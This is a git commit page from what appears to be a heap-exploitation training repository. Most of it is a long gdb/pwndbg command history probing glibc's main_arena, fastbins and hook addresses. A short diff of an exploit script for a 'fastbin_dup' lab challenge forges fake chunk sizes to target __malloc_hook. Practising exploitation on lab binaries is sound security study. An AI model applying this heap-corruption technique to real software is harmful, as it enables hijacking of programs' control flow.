indigo/heaplab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

modified: HeapLAB/challenge-fastbin_dup/.gdb_history

Browse Source 
modified:   HeapLAB/challenge-fastbin_dup/bruh.py
This commit is contained in:
Brett Weiland 2021-01-04 18:48:38 -06:00
parent ba02c1bd69
commit 4c06c05f4e
2 changed files with 225 additions and 224 deletions
HeapLAB/challenge-fastbin_dup
.gdb_historybruh.py

442
HeapLAB/challenge-fastbin_dup/.gdb_history

@ -1,224 +1,3 @@
x &main_arena
x/100x &main_arena
print main_arena
fastbins
q
fastbins
fastbins
c
exit
quit
quit
fastbins
print main_arena
q
print main_arena
q
vis_heap_chunks
print main_arena
db main_arena
db &main_arena
db &main_arena/100
db &main_arena 100
db &main_arena 1000
x main_arena.top
x &main_arena.top
db &main_arena 100
c
fastbins
print main_arena
x main_arena.fasbinsY
x &main_arena.fastbinsY
quit
fastbins
x 0x7f0946700b70
db 0x7f0946700b70 100
q
fastbins
q
fastbins
q
fastbinsx
db &main_arena 100
q
db 0x7f2e5c845b60
0x7f2e5c845b70 + 16
x 0x7f2e5c845b70 + 16
x 0x7f2e5c845b70
x 0x7f2e5c845b70
x 0x7f2e5c845b60
vis_heap_chunks
db 0x7f0ba6e3db70
db 0x555bdeaca000 100
db 0x7f0ba6e3db70
db 0x7f0ba6e3db70 - 8
db 0x7f0ba6e3db70-8
db 0x7f0ba6e3db70-7
q
x 0x7fcf882cbb69
db 0x7fcf882cbb69
q
vis_heap_chunks
print main_arena
q
print main_arena
vis_heap_chunks
q
print main_arena
q
print main_arena
fastbins
r
q
r
c
fastbisn
vis_heap_chunks
fastbins
quit
fastbins
print main_arena
c
print main_arena
q
print main_arena
print main_arena
x malloc_free_hook
x __free_hook
x &__free_hook
x &__free_hook 100
db &__free_hook 100
q
q
q
q
print main_arena
db 0x7f4858584e10
c
print victim
q
fastbins
c
x idx
x chunksize(p)
x chunksize
x p
fastbins
q
x __free_hook
x &__free_hook 100
db &__free_hook 100
db &__free_hook - 100
db &__free_hook-100
db &__free_hook-100 100
print main_arena
x 0x7fca0f75fe10
x/100 0x7fca0f75fe10
x/100 0x7fca0f75fe10-100
c
q
break malloc
c
fastbins
x __free_hook
fastins
fastbins
print main_arena
x 0x7f072b59ee10
break malloc
break free
continue
c
c
c
print main_arena
vis_heap_chunks
vis_heap_chunks
c
vis_heap_chunks
break free
break malloc
c
print main_arena
x &__free_hook - 16
q
print main_arena
vis_heap_chunks
c
c
c
q
db __malloc_hook
db &__malloc_hook
x __malloc_hook
x &__malloc_hook
c
break sysmalloc
c
frame 2
context
c
break main
c
q
x &__malloc_hook
print __malloc_hook
print &__malloc_hook
print __main_arena
print main_arena
print main_arena
x __malloc_hook
x &__malloc_hook
db &__malloc_hook
db &__malloc_hook-100 100
db &__malloc_hook-100 100*8
db &__malloc_hook-100 (100*8)+1
fastbins
c
print main_arena
x __malloc_hook
x &__malloc_hook
db &__malloc_hook-100 (100*8)+1
c
db &__malloc_hook-100 (100*8)+1
print main_arena
x 0x7f5b07a18b40
break malloc
c
c
c
q
break __libc_malloc
break malloc
break __malloc_hook
b __malloc_hook
b &__malloc_hook
b *__malloc_hook
b *&__malloc_hook
c
delete 3
c
pwndbg heap
vis_heap_chunks
print __mallinfo
x __mallinfo
print &__mallinfo
print *__mallinfo
print __mallinfo
print &__mallinfo
print main_arena
c
break malloc
c
x main_arena.top_check
x main_arena.top_chunk
print main_arena
x 0x7f4854db6b40
x 0x7f4854db6b40
x 0x7f4854db6b40
c
x 0x7f4854db6b40
fastbins
c
x 0x7f4854db6b40
c
@ -254,3 +33,224 @@ fastbins
r
c
quit
db main_arena
db &main_arena.fastbinsY
q
r
c
c
fastbins
print &main_arena
print main_arena
c
print main_arena
db main_arena
db &main_arena
db &main_arena/100
db &main_arena 100
db &main_arena 1000
q
db main_arena.bins
db &main_arena.fastbinsY
run
c
c
q
r
c
fastbins
c
fastbins
c
fastbins
r
c
c
r
1
c
c
print main_arena
x __malloc_hook
x &__malloc_hook
x 0x7ffff7dd0bc0
x &main_arena
q
print &main_arena
print main_arena
db main_arena
db &main_arena 100
print main_arena
print &main_arena
db &main_arena
db &main_arena + 1
db &main_arena+1
find_fake_fast main_arena.fastbinsY
find_fake_fast &main_arena.fastbinsY
x &main_arena.fastbinsY
db main_arena
db &main_arena
db &main_arena+1
db &main_arena+0
dq &main_arena+0
dq &main_arena+1
x/x 00007fc130a1cb60
x/x 0x00007fc130a1cb60
x/x 0x7fc130a1cb69
x main_arena
x &main_arena
x 0x0x7fc130a1cb68
x 0x7fc130a1cb68
x 0x7fc130a1cb68+1
x/10x 0x7fc130a1cb68+1
x/10x 0x7fc130a1cb68+0
x/10x 0x7fc130a1cb68+1
x/10x 0x7fc130a1cb69
db 0x7fc130a1cb69
db 0x7fc130a1cb71
db 0x7fc130a1cb70
x main_arena
print &main_arena
db &main_arena+1
dq &main_arena+1
q
x 0x7f7151e3cb70
db 0x7f7151e3cb70
db main_arena
db &main_arena
print main_arena
x main_arena
print &main_arena
db 0x7f7151e3cb69
db 0x7f7151e3cb68
db 0x7f7151e3cb67
db 0x7f7151e3cb68
db 0x7f7151e3cb69
dq 0x7f7151e3cb69
db 0x7f7151e3cb69
db 0x7f7151e3cb67
db 0x7f7151e3cb69
db 0x7f7151e3cb68
find_fake_fast main_arena
find_fake_fast &main_arena
db 0x7f7151e3cb68
db 0x7f7151e3cb69
db 0x7f7151e3cb67
db 0x7f7151e3cb68
db 0x7f7151e3cb70
db 0x7fc130a1cb69
db 0x7f7151e3cb70
db 0x7f7151e3cb69
find_fake_fast &__free_hook
find_fake_fast &__realloc_hook
find_fake_fast &__memalign_hook
find_fake_fast &__malloc_initialize_hook
find_fake_fast &__after_morecore_hook
find_fake_fast q
q
quit
q
fastbins
c
frame 4
context code
x 0x7fd533e9cb68
db 0x7fd533e9cb68
x fastbins
print main_heap
print &main_heap
print &main_arena
print main_arena
db 0x7fee89f0ee10
db 0x7fee89f0ee10 10
db 0x7fee89f0ee10 48
db 0x7fee89f0ee10-3 48
db 0x7fee89f0ee10-3 (16*4)
db 0x7fee89f0ee10
db 0x7fee89f0ee10 - 1
db 0x7fee89f0ee10-1
db 0x7fee89f0ee10-1 1
db 0x7fee89f0ee10-1 32
db 0x7fee89f0ee10-1 (48)
db 0x7fee89f0ee10-1 (48 * 3)
db 0x7fee89f0ee10-1 (48*3)
db 0x7fee89f0ee10-1
db 0x7fee89f0ee10
q
print main_arena
x 0x7fdb92f8ee10
c
find_fake_fast &malloc_hook
find_fake_fast &__malloc_hook
x __malloc_hook
x &__malloc_hook
x &__malloc_hook
x &__malloc_hook - 16
x &__malloc_hook
db &__malloc_hook-100
db &__malloc_hook-100 100
db &__malloc_hook-1
db &__malloc_hook
db &__malloc_hook-48 48
db &__malloc_hook-48 48 * 8
db &__malloc_hook-48 48*8
db &__malloc_hook-48*8 48
db &__malloc_hook-80*8 80
db &__malloc_hook-160*8 80
db &__malloc_hook-160 80
db -h
db &__malloc_hook
x __malloc_hook
x &__malloc_hook
x __malloc_hook-100
x &__malloc_hook-100
x &__malloc_hook-100 100
x &__malloc_hook-100 100
db &__malloc_hook-100 100
db &__malloc_hook-100 100*8
print (void*)&malloc_hook
print (void*)&__malloc_hook
db &__malloc_hook-100 101*8
db &__malloc_hook-100 101*8
db &__malloc_hook-100 100*8
db &__malloc_hook-100
db &__malloc_hook-(16*9)
db &__malloc_hook-(16*9) 16*9
db &__malloc_hook-(10) (10*16)
db &__malloc_hook-(10) (10*8)
db &__malloc_hook-(1) (10*8)
db &__malloc_hook-(11
db &__malloc_hook
db &__malloc_hook-1
db &__malloc_hook-8
db &__malloc_hook
db &__malloc_hook-32
db &__malloc_hook-(32/8)
db &__malloc_hook-(32/8) 1
db &__malloc_hook-(32/8) 10
db 0x7f5575614b2a 1
db 0x7f5575614b2a
db 0x7f5575614b20
db &__malloc_loc
db &__malloc_hook-(16) (16*8)
print (void*)__malloc_hook
print (void*)&__malloc_hook
db 0x7f5575614b36
0x7f5575614b2a
find_fake_fast
find_fake_fast &__malloc_hook
print (void*)&__malloc_hook
exit
quit
print main_arena
x 0x7f265fd4cb2d
x 0x7f265fd4cb2d
db 0x7f265fd4cb2d
print (void*)&__malloc_hook
find_fake_fast &__malloc_hook
db 0x7f265fd4cb2d
db 0x7f265fd4cb2d - 1
db 0x7f265fd4cb2d-1
db
c
db &__malloc_hook-(16) (16*8)

7
HeapLAB/challenge-fastbin_dup/bruh.py

@ -55,7 +55,7 @@ free(chunk1)
#malloc(24, p64(libc.sym.main_arena + 96))
#this sets up a fake size field in the fastbins
malloc(24, p64(0x81))
malloc(24, p64(0x80))
malloc(24, 'asdf')
malloc(24, 'asdf')
@ -74,9 +74,10 @@ malloc(119, 'sdfg')
#8 * 9
malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
payload_loc = libc.sym.__malloc_hook - 35
malloc(119, p64(0)*9 + p64(payload_loc))
print(hex(fake_chunk_loc))
print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================